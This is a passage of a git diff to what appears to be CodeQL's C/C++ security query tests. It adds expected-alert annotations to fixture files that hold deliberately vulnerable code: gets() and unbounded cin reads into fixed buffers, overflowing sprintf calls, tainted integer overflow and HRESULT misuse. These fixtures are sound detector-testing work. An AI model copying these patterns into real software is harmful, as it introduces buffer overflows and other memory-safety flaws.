(int)(unsigned char)*cmd; // BAD: overflow - int y = CAST(*cmd); // BAD: overflow in macro expansion (macro is not from a system header) + int x = (int)(unsigned char)*cmd; // BAD: overflow // $ Alert[cpp/integer-overflow-tainted] + int y = CAST(*cmd); // BAD: overflow in macro expansion (macro is not from a system header) // $ Alert[cpp/integer-overflow-tainted] int z = SYSTEM_CAST(*cmd); // GOOD: overflow in macro expansion (macro from a system header) return x + y + z; } diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/tainted/test4.cpp b/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/tainted/test4.cpp index ad4cc80d30ac..c298e431e946 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/tainted/test4.cpp +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/tainted/test4.cpp @@ -10,7 +10,7 @@ int main4(int argc, char **argv) { if (!p[0]) { // GOOD: cast to bool. return 1; } - if ((unsigned)p[1] == 0) { // BAD: cast to unsigned could overflow. + if ((unsigned)p[1] == 0) { // BAD: cast to unsigned could overflow. // $ Alert[cpp/integer-overflow-tainted] return 2; } if ((bool)p[2] != 0 || !p[3] == 1) { // GOOD: casts to bool. diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/tainted/test5.cpp b/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/tainted/test5.cpp index 2ee675be6b57..27b4a652e35b 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/tainted/test5.cpp +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/tainted/test5.cpp @@ -6,17 +6,17 @@ int getTaintedInt() { char buf[128]; - gets(buf); - return strtoul(buf, 0, 10); + gets(buf); // $ Source[cpp/tainted-arithmetic] + return strtoul(buf, 0, 10); // $ Alert[cpp/integer-overflow-tainted] } void useTaintedInt() { int x, y; - x = getTaintedInt() * 1024; // BAD: arithmetic on a tainted value + x = getTaintedInt() * 1024; // BAD: arithmetic on a tainted value // $ Alert[cpp/integer-overflow-tainted] Alert[cpp/tainted-arithmetic] y = getTaintedInt(); - y = y * 1024; // BAD: arithmetic on a tainted value + y = y * 1024; // BAD: arithmetic on a tainted value // $ Alert[cpp/integer-overflow-tainted] Alert[cpp/tainted-arithmetic] } typedef long long int intmax_t; diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/tainted/test6.cpp b/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/tainted/test6.cpp index c7034e6cd0ea..596e5030baed 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/tainted/test6.cpp +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/tainted/test6.cpp @@ -8,12 +8,12 @@ FILE *stdin; void docast1(u32 s) { - u16 c = (u16)s; // bad + u16 c = (u16)s; // bad // $ Alert[cpp/integer-overflow-tainted] } void docast2(u32 s) { - u16 c = (u16)s; // bad + u16 c = (u16)s; // bad // $ Alert[cpp/integer-overflow-tainted] } class MyBaseClass @@ -27,7 +27,7 @@ class MyDerivedClass : public MyBaseClass public: void docast(u32 s) { - u16 c = (u16)s; // bad + u16 c = (u16)s; // bad // $ Alert[cpp/integer-overflow-tainted] } }; diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-191/UnsignedDifferenceExpressionComparedZero/UnsignedDifferenceExpressionComparedZero.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-191/UnsignedDifferenceExpressionComparedZero/UnsignedDifferenceExpressionComparedZero.qlref index 9681978c0ad1..ebdee8ed6310 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-191/UnsignedDifferenceExpressionComparedZero/UnsignedDifferenceExpressionComparedZero.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-191/UnsignedDifferenceExpressionComparedZero/UnsignedDifferenceExpressionComparedZero.qlref @@ -1 +1,2 @@ -Security/CWE/CWE-191/UnsignedDifferenceExpressionComparedZero.ql +query: Security/CWE/CWE-191/UnsignedDifferenceExpressionComparedZero.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-191/UnsignedDifferenceExpressionComparedZero/test.cpp b/cpp/ql/test/query-tests/Security/CWE/CWE-191/UnsignedDifferenceExpressionComparedZero/test.cpp index 37930f821291..c143bb62cdea 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-191/UnsignedDifferenceExpressionComparedZero/test.cpp +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-191/UnsignedDifferenceExpressionComparedZero/test.cpp @@ -3,11 +3,11 @@ int getAnInt(); bool cond(); void test(unsigned x, unsigned y, bool unknown) { - if(x - y > 0) { } // BAD + if(x - y > 0) { } // BAD // $ Alert unsigned total = getAnInt(); unsigned limit = getAnInt(); - while(limit - total > 0) { // BAD + while(limit - total > 0) { // BAD // $ Alert total += getAnInt(); } @@ -59,7 +59,7 @@ void test(unsigned x, unsigned y, bool unknown) { if(unknown) { ++y; } } - if(x - y > 0) { } // GOOD [FALSE POSITIVE] + if(x - y > 0) { } // GOOD [FALSE POSITIVE] // $ Alert x = y; while(cond()) { @@ -72,7 +72,7 @@ void test(unsigned x, unsigned y, bool unknown) { if (n > x - y) { n = x - y; } if (n > 0) { y += n; // NOTE: `n` is at most `x - y` at this point. - if (x - y > 0) {} // GOOD [FALSE POSITIVE] + if (x - y > 0) {} // GOOD [FALSE POSITIVE] // $ Alert } } @@ -98,7 +98,7 @@ void test4() { unsigned int a = getAnInt(); unsigned int b = a + 1; - if (a - b > 0) { // BAD + if (a - b > 0) { // BAD // $ Alert // ... } } @@ -125,7 +125,7 @@ void test7() { unsigned int b = getAnInt(); unsigned int a = b - 1; - if (a - b > 0) { // BAD + if (a - b > 0) { // BAD // $ Alert // ... } } @@ -134,7 +134,7 @@ void test8() { unsigned int a = getAnInt(); unsigned int b = getAnInt(); - if (a - b > 0) { // BAD + if (a - b > 0) { // BAD // $ Alert // ... } @@ -143,13 +143,13 @@ void test8() { // ... } } else { - if (a - b > 0) { // BAD + if (a - b > 0) { // BAD // $ Alert // ... } } if (b >= a) { // GOOD - if (a - b > 0) { // BAD + if (a - b > 0) { // BAD // $ Alert // ... } } else { @@ -179,7 +179,7 @@ void test9() { b = 0; } - if (a - b > 0) { // GOOD (as a >= b) [FALSE POSITIVE] + if (a - b > 0) { // GOOD (as a >= b) [FALSE POSITIVE] // $ Alert // ... } } @@ -205,7 +205,7 @@ void test11() { b = getAnInt(); - if (a - b > 0) { // BAD + if (a - b > 0) { // BAD // $ Alert // ... } } @@ -249,7 +249,7 @@ int test14() { return 0; } // b != 0 - return (a - b > 0); // BAD + return (a - b > 0); // BAD // $ Alert } struct Numbers @@ -263,7 +263,7 @@ int test15(Numbers *n) { return 0; } - return (n->a - n->b > 0); // BAD + return (n->a - n->b > 0); // BAD // $ Alert } int test16() { @@ -273,7 +273,7 @@ int test16() { if (!b) { return 0; } else { - return (a - b > 0); // BAD + return (a - b > 0); // BAD // $ Alert } } @@ -285,7 +285,7 @@ int test17() { return 0; } // b != 0 - return (a - b > 0); // BAD + return (a - b > 0); // BAD // $ Alert } int test18() { @@ -309,7 +309,7 @@ void test19() { uint32_t limit = get_limit(); uint32_t total = 0; - while (limit - total > 0) { // BAD: if `total` is greater than `limit` this will underflow and continue executing the loop. + while (limit - total > 0) { // BAD: if `total` is greater than `limit` this will underflow and continue executing the loop. // $ Alert total += get_data(); } @@ -359,7 +359,7 @@ void test21(unsigned long a) if(a - b > 0) { } // GOOD } int64_t b = (int64_t)a + c; - if(a - b > 0) { } // BAD + if(a - b > 0) { } // BAD // $ Alert } { diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-193/InvalidPointerDeref.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-193/InvalidPointerDeref.qlref index b899b6eeb205..75e8699aaac2 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-193/InvalidPointerDeref.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-193/InvalidPointerDeref.qlref @@ -1 +1 @@ -Security/CWE/CWE-193/InvalidPointerDeref.ql +query: Security/CWE/CWE-193/InvalidPointerDeref.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-197/SAMATE/IntegerOverflowTainted/IntegerOverflowTainted.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-197/SAMATE/IntegerOverflowTainted/IntegerOverflowTainted.qlref index 72ed7d536854..419ed80f3b9e 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-197/SAMATE/IntegerOverflowTainted/IntegerOverflowTainted.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-197/SAMATE/IntegerOverflowTainted/IntegerOverflowTainted.qlref @@ -1 +1,2 @@ -Security/CWE/CWE-190/IntegerOverflowTainted.ql \ No newline at end of file +query: Security/CWE/CWE-190/IntegerOverflowTainted.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-197/SAMATE/IntegerOverflowTainted/tests.cpp b/cpp/ql/test/query-tests/Security/CWE/CWE-197/SAMATE/IntegerOverflowTainted/tests.cpp index 79f9a79c97fc..76d25fbe46c8 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-197/SAMATE/IntegerOverflowTainted/tests.cpp +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-197/SAMATE/IntegerOverflowTainted/tests.cpp @@ -35,7 +35,7 @@ void CWE197_Numeric_Truncation_Error__short_fscanf_82_bad::action(short data) { { /* POTENTIAL FLAW: Convert data to a char, possibly causing a truncation error */ - char charData = (char)data; + char charData = (char)data; // $ Alert printHexCharLine(charData); } } diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-242/semmle/tests/DangerousFunctionOverflow.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-242/semmle/tests/DangerousFunctionOverflow.qlref index e46499468514..41d5b35b3c97 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-242/semmle/tests/DangerousFunctionOverflow.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-242/semmle/tests/DangerousFunctionOverflow.qlref @@ -1 +1,2 @@ -Security/CWE/CWE-676/DangerousFunctionOverflow.ql +query: Security/CWE/CWE-676/DangerousFunctionOverflow.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-242/semmle/tests/DangerousUseOfCin.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-242/semmle/tests/DangerousUseOfCin.qlref index 676e30536454..a5067fc5ee1a 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-242/semmle/tests/DangerousUseOfCin.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-242/semmle/tests/DangerousUseOfCin.qlref @@ -1 +1,2 @@ -Security/CWE/CWE-676/DangerousUseOfCin.ql \ No newline at end of file +query: Security/CWE/CWE-676/DangerousUseOfCin.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-242/semmle/tests/OverrunWrite.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-242/semmle/tests/OverrunWrite.qlref index f6c962c1a7b4..18ae0f2a567b 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-242/semmle/tests/OverrunWrite.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-242/semmle/tests/OverrunWrite.qlref @@ -1 +1,2 @@ -Security/CWE/CWE-120/OverrunWrite.ql \ No newline at end of file +query: Security/CWE/CWE-120/OverrunWrite.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-242/semmle/tests/OverrunWriteFloat.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-242/semmle/tests/OverrunWriteFloat.qlref index 757d1592e830..ba8f6a96a1fd 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-242/semmle/tests/OverrunWriteFloat.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-242/semmle/tests/OverrunWriteFloat.qlref @@ -1 +1,2 @@ -Security/CWE/CWE-120/OverrunWriteFloat.ql \ No newline at end of file +query: Security/CWE/CWE-120/OverrunWriteFloat.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-242/semmle/tests/VeryLikelyOverrunWrite.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-242/semmle/tests/VeryLikelyOverrunWrite.qlref index 94b53951c4b7..8dcc2f70c2f6 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-242/semmle/tests/VeryLikelyOverrunWrite.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-242/semmle/tests/VeryLikelyOverrunWrite.qlref @@ -1 +1,2 @@ -Security/CWE/CWE-120/VeryLikelyOverrunWrite.ql \ No newline at end of file +query: Security/CWE/CWE-120/VeryLikelyOverrunWrite.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-242/semmle/tests/tests.cpp b/cpp/ql/test/query-tests/Security/CWE/CWE-242/semmle/tests/tests.cpp index 8bb6dfdd996c..870d6786e000 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-242/semmle/tests/tests.cpp +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-242/semmle/tests/tests.cpp @@ -109,7 +109,7 @@ char *test1() { static char buffer[1024]; - return gets(buffer); // BAD: use of gets + return gets(buffer); // BAD: use of gets // $ Alert[cpp/dangerous-function-overflow] } typedef char MYCHAR; @@ -126,10 +126,10 @@ void test2() char *buffer4 = buffer1; std::istream &input = std::cin; - std::cin >> buffer1; // BAD: use of operator>> into a statically-allocated character array - std::cin >> buffer2; // BAD: use of operator>> into a statically-allocated character array - std::cin >> buffer3; // BAD: use of operator>> into a statically-allocated character array - std::cin >> buffer4; // BAD: use of operator>> into a statically-allocated character array + std::cin >> buffer1; // BAD: use of operator>> into a statically-allocated character array // $ Alert[cpp/dangerous-cin] + std::cin >> buffer2; // BAD: use of operator>> into a statically-allocated character array // $ Alert[cpp/dangerous-cin] + std::cin >> buffer3; // BAD: use of operator>> into a statically-allocated character array // $ Alert[cpp/dangerous-cin] + std::cin >> buffer4; // BAD: use of operator>> into a statically-allocated character array // $ Alert[cpp/dangerous-cin] input >> buffer1; // BAD: use of operator>> into a statically-allocated character array (NOT DETECTED) } @@ -154,7 +154,7 @@ void test2() int i, j, k; std::cin >> i >> j >> k; // GOOD: destinations are not character arrays - std::cin >> i >> buffer >> k; // BAD: use of operator>> into a statically-allocated character array + std::cin >> i >> buffer >> k; // BAD: use of operator>> into a statically-allocated character array // $ Alert[cpp/dangerous-cin] } @@ -163,7 +163,7 @@ void test2() static char buf[1024]; static int i; - std::wcin >> wbuf; // BAD: use of operator>> into a statically-allocated character array + std::wcin >> wbuf; // BAD: use of operator>> into a statically-allocated character array // $ Alert[cpp/dangerous-cin] std::wcin >> i; // GOOD: destination is not a character array } @@ -174,9 +174,9 @@ void test2() char buf[4096]; int i; - my_ifstream >> buf; // BAD: use of operator>> into a statically-allocated character array + my_ifstream >> buf; // BAD: use of operator>> into a statically-allocated character array // $ Alert[cpp/dangerous-cin] my_ifstream >> i; // GOOD: destination is not a character array - my_wifstream >> wbuf; // BAD: use of operator>> into a statically-allocated character array + my_wifstream >> wbuf; // BAD: use of operator>> into a statically-allocated character array // $ Alert[cpp/dangerous-cin] my_wifstream >> i; // GOOD: destination is not a character array } @@ -187,10 +187,10 @@ void test2() std::cin.width(10); std::cin >> buf1; // GOOD: controlled by width() - std::cin >> buf2; // BAD: uncontrolled by width() + std::cin >> buf2; // BAD: uncontrolled by width() // $ Alert[cpp/dangerous-cin] std::cin.width(10); - std::cin >> buf1 >> buf2; // BAD: buf2 is uncontrolled by width() + std::cin >> buf1 >> buf2; // BAD: buf2 is uncontrolled by width() // $ Alert[cpp/dangerous-cin] std::cin.width(10); std::cin >> i; // GOOD: destination is not a character array @@ -200,18 +200,18 @@ void test2() std::cin >> i >> buf1; // GOOD: controlled by width() std::cin.width(20); - std::cin >> buf1; // BAD: specified width is too large + std::cin >> buf1; // BAD: specified width is too large // $ Alert[cpp/dangerous-cin] std::cin.width(int_func()); std::cin >> buf1; // GOOD: controlled by width() std::wcin.width(10); - std::cin >> buf2; // BAD: uncontrolled by width() + std::cin >> buf2; // BAD: uncontrolled by width() // $ Alert[cpp/dangerous-cin] std::wcin >> wbuf; // GOOD: controlled by width() std::cin >> std::setw(10) >> buf1; // GOOD: controlled by setw - std::cin >> std::setw(10) >> buf1 >> buf2; // BAD: buf2 is uncontrolled - std::cin >> std::setw(20) >> buf1; // BAD: specified width is too large + std::cin >> std::setw(10) >> buf1 >> buf2; // BAD: buf2 is uncontrolled // $ Alert[cpp/dangerous-cin] + std::cin >> std::setw(20) >> buf1; // BAD: specified width is too large // $ Alert[cpp/dangerous-cin] std::cin.width(20); std::cin.width(10); @@ -222,7 +222,7 @@ void test2() char buf[10]; int i; - (std::cin >> i) >> buf; // BAD: use of operator>> into a statically-allocated character array + (std::cin >> i) >> buf; // BAD: use of operator>> into a statically-allocated character array // $ Alert[cpp/dangerous-cin] (std::cin >> i).width(10); std::cin >> buf; // GOOD: controlled by width() @@ -234,7 +234,7 @@ void test2() char buf[10]; std::string str; - std::cin >> std::setw(10) >> str >> buf; // BAD: buf is uncontrolled + std::cin >> std::setw(10) >> str >> buf; // BAD: buf is uncontrolled // $ Alert[cpp/dangerous-cin] } } @@ -246,8 +246,8 @@ void test3(char c, int val, char *str) char buffer10[10]; MyCharArray myBuffer10; - gets(buffer10); // BAD: use of gets - gets(myBuffer10); // BAD: use of gets + gets(buffer10); // BAD: use of gets // $ Alert[cpp/dangerous-function-overflow] + gets(myBuffer10); // BAD: use of gets // $ Alert[cpp/dangerous-function-overflow] sprintf(buffer10, "%c", c); // GOOD sprintf(myBuffer10, "%c", c); // GOOD @@ -255,8 +255,8 @@ void test3(char c, int val, char *str) sprintf(buffer10, "%s", str); // BAD: potential buffer overflow [NOT DETECTED] sprintf(myBuffer10, "%s", str); // BAD: potential buffer overflow [NOT DETECTED] - sprintf(buffer10, "val: %i", val); // BAD: potential buffer overflow - sprintf(myBuffer10, "val: %i", val); // BAD: potential buffer overflow + sprintf(buffer10, "val: %i", val); // BAD: potential buffer overflow // $ Alert[cpp/overrunning-write] + sprintf(myBuffer10, "val: %i", val); // BAD: potential buffer overflow // $ Alert[cpp/overrunning-write] } void test3_caller() @@ -269,8 +269,8 @@ void test4() char buffer8[8]; char *buffer8_ptr = buffer8; - sprintf(buffer8, "12345678"); // BAD: buffer overflow - sprintf(buffer8_ptr, "12345678"); // BAD: buffer overflow + sprintf(buffer8, "12345678"); // BAD: buffer overflow // $ Alert[cpp/very-likely-overrunning-write] + sprintf(buffer8_ptr, "12345678"); // BAD: buffer overflow // $ Alert[cpp/very-likely-overrunning-write] } typedef void *va_list; @@ -284,7 +284,7 @@ void test5(va_list args, float f) vsprintf(buffer10, "123456789", args); // GOOD vsprintf(buffer10, "1234567890", args); // BAD: buffer overflow [NOT DETECTED] - sprintf(buffer64, "%f", f); // BAD: potential buffer overflow + sprintf(buffer64, "%f", f); // BAD: potential buffer overflow // $ Alert[cpp/overrunning-write-with-float] vsprintf(buffer4, "123", args); // GOOD vsprintf(buffer4, "1234", args); // BAD: buffer overflow [NOT DETECTED] @@ -305,28 +305,28 @@ namespace custom_sprintf_impl { void regression_test1() { char buffer8[8]; - sprintf(buffer8, "12345678"); // BAD: potential buffer overflow + sprintf(buffer8, "12345678"); // BAD: potential buffer overflow // $ Alert[cpp/very-likely-overrunning-write] } } void test6(unsigned unsigned_value, int value) { char buffer2[2], buffer3[3], buffer4[4], buffer5[5]; - sprintf(buffer4, "%u", unsigned_value); // BAD: buffer overflow - sprintf(buffer4, "%d", unsigned_value); // BAD: buffer overflow + sprintf(buffer4, "%u", unsigned_value); // BAD: buffer overflow // $ Alert[cpp/overrunning-write] + sprintf(buffer4, "%d", unsigned_value); // BAD: buffer overflow // $ Alert[cpp/overrunning-write] if (unsigned_value < 1000) { sprintf(buffer4, "%u", unsigned_value); // GOOD } - sprintf(buffer4, "%u", -100); // BAD: buffer overflow + sprintf(buffer4, "%u", -100); // BAD: buffer overflow // $ Alert[cpp/very-likely-overrunning-write] if(unsigned_value == (unsigned)-100) { - sprintf(buffer4, "%u", unsigned_value); // BAD: buffer overflow + sprintf(buffer4, "%u", unsigned_value); // BAD: buffer overflow // $ Alert[cpp/very-likely-overrunning-write] } - sprintf(buffer4, "%d", value); // BAD: buffer overflow + sprintf(buffer4, "%d", value); // BAD: buffer overflow // $ Alert[cpp/overrunning-write] if (value < 1000) { - sprintf(buffer4, "%d", value); // BAD: buffer overflow + sprintf(buffer4, "%d", value); // BAD: buffer overflow // $ Alert[cpp/overrunning-write] if(value > -100) { sprintf(buffer4, "%d", value); // GOOD @@ -338,28 +338,28 @@ void test6(unsigned unsigned_value, int value) { sprintf(buffer2, "%u", 5); // GOOD sprintf(buffer2, "%d", 5); // GOOD - sprintf(buffer2, "%d", -1); // BAD + sprintf(buffer2, "%d", -1); // BAD // $ Alert[cpp/very-likely-overrunning-write] sprintf(buffer2, "%d", 9); // GOOD - sprintf(buffer2, "%d", 10); // BAD + sprintf(buffer2, "%d", 10); // BAD // $ Alert[cpp/very-likely-overrunning-write] - sprintf(buffer2, "%u", -1); // BAD + sprintf(buffer2, "%u", -1); // BAD // $ Alert[cpp/very-likely-overrunning-write] sprintf(buffer2, "%u", 9); // GOOD - sprintf(buffer2, "%u", 10); // BAD + sprintf(buffer2, "%u", 10); // BAD // $ Alert[cpp/very-likely-overrunning-write] unsigned char unsigned_char = unsigned_value; - sprintf(buffer3, "%u", (unsigned)unsigned_char); // BAD + sprintf(buffer3, "%u", (unsigned)unsigned_char); // BAD // $ Alert[cpp/overrunning-write] sprintf(buffer4, "%u", (unsigned)unsigned_char); // GOOD: 0..255 fits unsigned small = unsigned_value >> (sizeof(unsigned_value) * 8 - 9); // in range 0..511 - sprintf(buffer3, "%u", small); // BAD + sprintf(buffer3, "%u", small); // BAD // $ Alert[cpp/very-likely-overrunning-write] sprintf(buffer4, "%u", small); // GOOD small = unsigned_value & ((1u << 9) - 1); // in range 0..511 - sprintf(buffer3, "%u", small); // BAD + sprintf(buffer3, "%u", small); // BAD // $ Alert[cpp/very-likely-overrunning-write] sprintf(buffer4, "%u", small); // GOOD: 0..511 fits char c = value; - sprintf(buffer4, "%d", (int)c); // BAD: e.g. -127 does not fit + sprintf(buffer4, "%d", (int)c); // BAD: e.g. -127 does not fit // $ Alert[cpp/overrunning-write] sprintf(buffer5, "%d", (int)c); // GOOD: -127..128 fits } \ No newline at end of file diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-253/HResultBooleanConversion.c b/cpp/ql/test/query-tests/Security/CWE/CWE-253/HResultBooleanConversion.c index 732fd5f0f443..61c7817b5b93 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-253/HResultBooleanConversion.c +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-253/HResultBooleanConversion.c @@ -39,22 +39,22 @@ bool BoolFunction2() HRESULT IncorrectHresultFunction() { - return BoolFunction(); // BUG + return BoolFunction(); // BUG // $ Alert } HRESULT IncorrectHresultFunction2() { - return BoolFunction2(); // BUG + return BoolFunction2(); // BUG // $ Alert } void IncorrectTypeConversionTest() { HRESULT hr = HresultFunction(); - if ((BOOL)hr) // BUG + if ((BOOL)hr) // BUG // $ Alert { // ... } - if ((bool)hr) // BUG + if ((bool)hr) // BUG // $ Alert { // ... } @@ -63,11 +63,11 @@ void IncorrectTypeConversionTest() { // ... } - if (SUCCEEDED(BoolFunction())) // BUG + if (SUCCEEDED(BoolFunction())) // BUG // $ Alert { // ... } - if (SUCCEEDED(BoolFunction2())) // BUG + if (SUCCEEDED(BoolFunction2())) // BUG // $ Alert { // ... } @@ -75,11 +75,11 @@ void IncorrectTypeConversionTest() { { // ... } - BOOL b = IncorrectHresultFunction(); // BUG - bool b2 = IncorrectHresultFunction(); // BUG + BOOL b = IncorrectHresultFunction(); // BUG // $ Alert + bool b2 = IncorrectHresultFunction(); // BUG // $ Alert hr = E_UNEXPECTED; - if (!hr) // BUG + if (!hr) // BUG // $ Alert { // ... } @@ -89,7 +89,7 @@ void IncorrectTypeConversionTest() { } hr = S_FALSE; - if (hr) // BUG + if (hr) // BUG // $ Alert { // ... } @@ -103,7 +103,7 @@ void IncorrectTypeConversionTest() { // ... } - while (!HresultFunction()) {}; // BUG + while (!HresultFunction()) {}; // BUG // $ Alert while (FAILED(HresultFunction())) {}; // Correct Usage switch(hr) // Correct Usage diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-253/HResultBooleanConversion.cpp b/cpp/ql/test/query-tests/Security/CWE/CWE-253/HResultBooleanConversion.cpp index d2857226bfaa..8e1ede3d618d 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-253/HResultBooleanConversion.cpp +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-253/HResultBooleanConversion.cpp @@ -36,22 +36,22 @@ bool BoolFunction2() HRESULT IncorrectHresultFunction() { - return BoolFunction(); // BUG + return BoolFunction(); // BUG // $ Alert } HRESULT IncorrectHresultFunction2() { - return BoolFunction2(); // BUG + return BoolFunction2(); // BUG // $ Alert } void IncorrectTypeConversionTest() { HRESULT hr = HresultFunction(); - if ((BOOL)hr) // BUG + if ((BOOL)hr) // BUG // $ Alert { // ... } - if ((bool)hr) // BUG + if ((bool)hr) // BUG // $ Alert { // ... } @@ -60,11 +60,11 @@ void IncorrectTypeConversionTest() { // ... } - if (SUCCEEDED(BoolFunction())) // BUG + if (SUCCEEDED(BoolFunction())) // BUG // $ Alert { // ... } - if (SUCCEEDED(BoolFunction2())) // BUG + if (SUCCEEDED(BoolFunction2())) // BUG // $ Alert { // ... } @@ -72,11 +72,11 @@ void IncorrectTypeConversionTest() { { // ... } - BOOL b = IncorrectHresultFunction(); // BUG - bool b2 = IncorrectHresultFunction(); // BUG + BOOL b = IncorrectHresultFunction(); // BUG // $ Alert + bool b2 = IncorrectHresultFunction(); // BUG // $ Alert hr = E_UNEXPECTED; - if (!hr) // BUG + if (!hr) // BUG // $ Alert { // ... } @@ -86,7 +86,7 @@ void IncorrectTypeConversionTest() { } hr = S_FALSE; - if (hr) // BUG + if (hr) // BUG // $ Alert { // ... } @@ -100,7 +100,7 @@ void IncorrectTypeConversionTest() { // ... } - while (!HresultFunction()) {}; // BUG + while (!HresultFunction()) {}; // BUG // $ Alert while (FAILED(HresultFunction())) {}; // Correct Usage switch(hr) // Correct Usage diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-253/HResultBooleanConversion.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-253/HResultBooleanConversion.qlref index a345e5c6dfb3..101c0a1e3e2e 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-253/HResultBooleanConversion.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-253/HResultBooleanConversion.qlref @@ -1 +1,2 @@ -Security/CWE/CWE-253/HResultBooleanConversion.ql \ No newline at end of file +query: Security/CWE/CWE-253/HResultBooleanConversion.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-290/semmle/AuthenticationBypass/AuthenticationBypass.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-290/semmle/AuthenticationBypass/AuthenticationBypass.expected index 117f94cfad8a..205d347a7740 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-290/semmle/AuthenticationBypass/AuthenticationBypass.expected +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-290/semmle/AuthenticationBypass/AuthenticationBypass.expected @@ -1,3 +1,10 @@ +#select +| test.cpp:20:7:20:12 | call to strcmp | test.cpp:16:25:16:42 | *call to getenv | test.cpp:20:14:20:20 | *address | Untrusted input $@ might be vulnerable to a spoofing attack. | test.cpp:16:25:16:42 | *call to getenv | an environment variable | +| test.cpp:31:7:31:12 | call to strcmp | test.cpp:27:25:27:42 | *call to getenv | test.cpp:31:14:31:20 | *address | Untrusted input $@ might be vulnerable to a spoofing attack. | test.cpp:27:25:27:42 | *call to getenv | an environment variable | +| test.cpp:42:7:42:12 | call to strcmp | test.cpp:38:25:38:42 | *call to getenv | test.cpp:42:14:42:20 | *address | Untrusted input $@ might be vulnerable to a spoofing attack. | test.cpp:38:25:38:42 | *call to getenv | an environment variable | +| test.cpp:52:7:52:12 | call to strcmp | test.cpp:49:25:49:42 | *call to getenv | test.cpp:52:14:52:20 | *address | Untrusted input $@ might be vulnerable to a spoofing attack. | test.cpp:49:25:49:42 | *call to getenv | an environment variable | +| test.cpp:56:7:56:12 | call to strcmp | test.cpp:49:25:49:42 | *call to getenv | test.cpp:56:14:56:20 | *address | Untrusted input $@ might be vulnerable to a spoofing attack. | test.cpp:49:25:49:42 | *call to getenv | an environment variable | +| test.cpp:60:7:60:12 | call to strcmp | test.cpp:49:25:49:42 | *call to getenv | test.cpp:60:14:60:20 | *address | Untrusted input $@ might be vulnerable to a spoofing attack. | test.cpp:49:25:49:42 | *call to getenv | an environment variable | edges | test.cpp:16:25:16:42 | *call to getenv | test.cpp:16:25:16:42 | *call to getenv | provenance | | | test.cpp:16:25:16:42 | *call to getenv | test.cpp:20:14:20:20 | *address | provenance | | @@ -25,10 +32,3 @@ nodes | test.cpp:56:14:56:20 | *address | semmle.label | *address | | test.cpp:60:14:60:20 | *address | semmle.label | *address | subpaths -#select -| test.cpp:20:7:20:12 